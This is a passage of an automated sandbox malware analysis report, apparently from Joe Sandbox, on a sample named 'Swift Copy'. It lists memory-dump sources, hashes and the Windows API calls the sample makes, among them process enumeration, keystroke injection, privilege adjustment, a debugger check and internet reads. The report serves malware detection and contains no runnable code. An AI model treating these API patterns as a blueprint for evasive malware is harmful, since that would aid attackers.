                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: f83a1d2532a4b1b85f45042f06861450ddeb751da1b0c7c8142f2c6db8fe5ffa
                                              • Instruction ID: 1a0a8a3d373e0495a039283ca0ba2cc1dea0bd7e3eccc51e6cc83c1443e1478f
                                              • Opcode Fuzzy Hash: f83a1d2532a4b1b85f45042f06861450ddeb751da1b0c7c8142f2c6db8fe5ffa
                                              • Instruction Fuzzy Hash: 3D21A6317402115FE7248F2AD884B5ABBE5FF85315F19909CE846AF391DB72DC82CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                              • API String ID: 0-1546025612
                                              • Opcode ID: dc944d964f0cafc0d33563402160dd47044ff44b0ed56ff3e698ec07755a125c
                                              • Instruction ID: faed2f13bba237c633869d042bd5bc6ae536b276c010fd3fe6cfe9a538dc381d
                                              • Opcode Fuzzy Hash: dc944d964f0cafc0d33563402160dd47044ff44b0ed56ff3e698ec07755a125c
                                              • Instruction Fuzzy Hash: 2DA28070E4061ACBDF24CF58C8447EDB7B1BF54314F2881AAE85AA7285EB74DD81DB60
                                              APIs
                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DD82AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: ($tb$|
                                              • API String ID: 1659193697-1968160224
                                              • Opcode ID: e3f4b2a63dd9c19d5a20e44b97c46154bd12451040a8c505cd47ebfe9a29d20e
                                              • Instruction ID: 9012a48174f0a53876776ba37f0617141342b91069b55c76c3e4c8faa5a8ed19
                                              • Opcode Fuzzy Hash: e3f4b2a63dd9c19d5a20e44b97c46154bd12451040a8c505cd47ebfe9a29d20e
                                              • Instruction Fuzzy Hash: E9323574A007059FCB29CF59C481A6AB7F0FF48710B15C56EE49ADB3A1EB70E941DB60
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00DFA6AC
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00DFA6BA
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00DFA79C
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFA7AB
                                                • Part of subcall function 00D8CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00DB3303,?), ref: 00D8CE8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                              • String ID:
                                              • API String ID: 1991900642-0
                                              • Opcode ID: 22ef883611c946fdab582a7bbde792e6f26a454e85ef794a0c527f400bd74b93
                                              • Instruction ID: e7dcc0e1f17a49fb3de6e07faf0c5193c4efd68b84f7aea7b557d404209d5043
                                              • Opcode Fuzzy Hash: 22ef883611c946fdab582a7bbde792e6f26a454e85ef794a0c527f400bd74b93
                                              • Instruction Fuzzy Hash: 32512AB15083109FD710EF24C886A6BBBE8FF89754F04891DF589A7252EB70D904CBB2
                                              APIs
                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00DDAAAC
                                              • SetKeyboardState.USER32(00000080), ref: 00DDAAC8
                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00DDAB36
                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00DDAB88
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                              • Instruction ID: c29c33649785bb8fbfa49ef62733e318fced9dbe2be6949e9eea67e12b96927c
                                              • Opcode Fuzzy Hash: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                              • Instruction Fuzzy Hash: 7F311630A40218AEFB358B6D8C05BFA7BA6EB45310F18831BF191563E0D375C986C772
                                              APIs
                                              • _free.LIBCMT ref: 00DABB7F
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • GetTimeZoneInformation.KERNEL32 ref: 00DABB91
                                              • WideCharToMultiByte.KERNEL32(00000000,?,00E4121C,000000FF,?,0000003F,?,?), ref: 00DABC09
                                              • WideCharToMultiByte.KERNEL32(00000000,?,00E41270,000000FF,?,0000003F,?,?,?,00E4121C,000000FF,?,0000003F,?,?), ref: 00DABC36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                              • String ID:
                                              • API String ID: 806657224-0
                                              • Opcode ID: c6eed3e421a1e43b7d2eee23bb48516ef3f3ac12b9b5d900eb707420c46f2afe
                                              • Instruction ID: 0501a838078d3cecfb6fafd414ce37b92e50a19f94575852c689e48f38b47281
                                              • Opcode Fuzzy Hash: c6eed3e421a1e43b7d2eee23bb48516ef3f3ac12b9b5d900eb707420c46f2afe
                                              • Instruction Fuzzy Hash: BA31CE70944205DFCB10DF6ADC80929BBB8FF47320B1842AAE060E72B2D7709D86DB74
                                              APIs
                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00DECE89
                                              • GetLastError.KERNEL32(?,00000000), ref: 00DECEEA
                                              • SetEvent.KERNEL32(?,?,00000000), ref: 00DECEFE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorEventFileInternetLastRead
                                              • String ID:
                                              • API String ID: 234945975-0
                                              • Opcode ID: 6f60e0cf47f2b86d9f62b412565ea61cb998ebe26b48c4c8dbc0f34dbcd25cd8
                                              • Instruction ID: e6b7ebb48781d40c7ef1f0c3df3ee7a403908580b6c0a269fb7e75b13e18bffb
                                              • Opcode Fuzzy Hash: 6f60e0cf47f2b86d9f62b412565ea61cb998ebe26b48c4c8dbc0f34dbcd25cd8
                                              • Instruction Fuzzy Hash: D121BD71510705AFDB20EFA6C949BAB77F8EF00718F24441EE546A2151E774EE4A8B70
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DE5CC1
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DE5D17
                                              • FindClose.KERNEL32(?), ref: 00DE5D5F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID:
                                              • API String ID: 3541575487-0
                                              • Opcode ID: f73db7f37980b3eb7be873d5e9aabf9ef57424a11ef018b11a9e5729daa1ff10
                                              • Instruction ID: 3076af6c5323afa05fabe172ce2d0d6e07ea19206711f6f6bf3931063b7ddac1
                                              • Opcode Fuzzy Hash: f73db7f37980b3eb7be873d5e9aabf9ef57424a11ef018b11a9e5729daa1ff10
                                              • Instruction Fuzzy Hash: B251BD34600A419FC704DF29D894A9AB7E4FF49318F14855DE95A8B3A1DB30EC44CFA1
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 00DA271A
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DA2724
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00DA2731
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 51947eabc2ede1d6c40aeb2d6976920f950e5625bddb84390975de99a8f00c89
                                              • Instruction ID: 880b05dfdc5468ad2a7046cca2a39b4ad19f2d6f92c46754a993431a3e3e68cc
                                              • Opcode Fuzzy Hash: 51947eabc2ede1d6c40aeb2d6976920f950e5625bddb84390975de99a8f00c89
                                              • Instruction Fuzzy Hash: A831C274911218ABCB21DF69DC88798BBB8EF08310F5042EAE80CA6260E7349F858F54
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE51DA
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DE5238
                                              • SetErrorMode.KERNEL32(00000000), ref: 00DE52A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DiskFreeSpace
                                              • String ID:
                                              • API String ID: 1682464887-0
                                              • Opcode ID: 3853974c9cfd459b5aac727865006e85c97453ad0aff09a66b6940fce7de2039
                                              • Instruction ID: a180e468e7af9dc4ea7c3234154f14c2e6eb4569e91a7942e56b2a23cc223542
                                              • Opcode Fuzzy Hash: 3853974c9cfd459b5aac727865006e85c97453ad0aff09a66b6940fce7de2039
                                              • Instruction Fuzzy Hash: C4318135A00518DFDB00DF55D884EADBBB4FF49318F188099E909AB366DB31E845CBA0
                                              APIs
                                                • Part of subcall function 00D8FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D90668
                                                • Part of subcall function 00D8FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D90685
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD170D
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD173A
                                              • GetLastError.KERNEL32 ref: 00DD174A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                              • String ID:
                                              • API String ID: 577356006-0
                                              • Opcode ID: 1200e50a52fd3ddc8a78f36fc7f90bed98489d8c598527c9d996eeb5ccbc5f30
                                              • Instruction ID: 64e115ba378114e880c06d9410321787166c0707ce7d69217bd0f52ce369cb61
                                              • Opcode Fuzzy Hash: 1200e50a52fd3ddc8a78f36fc7f90bed98489d8c598527c9d996eeb5ccbc5f30
                                              • Instruction Fuzzy Hash: 1611CEB2400304FFE718AF64DC86D6AB7BDEB04714B20852EE45663251EB70FC868B30
                                              APIs
                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD608
                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00DDD645
                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD650
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle
                                              • String ID:
                                              • API String ID: 33631002-0
                                              • Opcode ID: 9a6130b58e3c5f687300da448597916c4f34d3204e349355509bbecf73e2cc64
                                              • Instruction ID: 1e6fb064364bfa844efff646e6645b82e1da4c8d6cf020f7dbed0bf7f70ed564
                                              • Opcode Fuzzy Hash: 9a6130b58e3c5f687300da448597916c4f34d3204e349355509bbecf73e2cc64
                                              • Instruction Fuzzy Hash: 4B113C75E05228BFDB108F959C45FAFBBBCEB45B50F108156F904E7290D6708A058BA1
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DD168C
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00DD16A1
                                              • FreeSid.ADVAPI32(?), ref: 00DD16B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                              • Instruction ID: 9662541c72d4aba8c22261e01715302077d187f33f2a46862c51e918b9708253
                                              • Opcode Fuzzy Hash: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                              • Instruction Fuzzy Hash: F7F04471940309FFEB00CFE08C89AAEBBBCEB08300F104561E500E2180E331AA488A60
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00DA28E9,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002,00000000,?,00DA28E9), ref: 00D94D09
                                              • TerminateProcess.KERNEL32(00000000,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002,00000000,?,00DA28E9), ref: 00D94D10
                                              • ExitProcess.KERNEL32 ref: 00D94D22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 0866c6ba25b1b3235b232c8546cf679d086de961e2a44bbfebfb1c93427eec55
                                              • Instruction ID: 7e4130eac1d583336ff64bff8036f12baebadc461bc39853e4de04c3d6ec9ccd
                                              • Opcode Fuzzy Hash: 0866c6ba25b1b3235b232c8546cf679d086de961e2a44bbfebfb1c93427eec55
                                              • Instruction Fuzzy Hash: 2EE0B635010148AFCF15AF55DD09E583B69FB46791B248154FC059A123CB3ADD86CAA0
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00DCD28C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID: X64
                                              • API String ID: 2645101109-893830106
                                              • Opcode ID: 28b786f1c6a760b04be9fd9ed82f9ad2d5a7ba88e93fd0b89594763d8ea08185
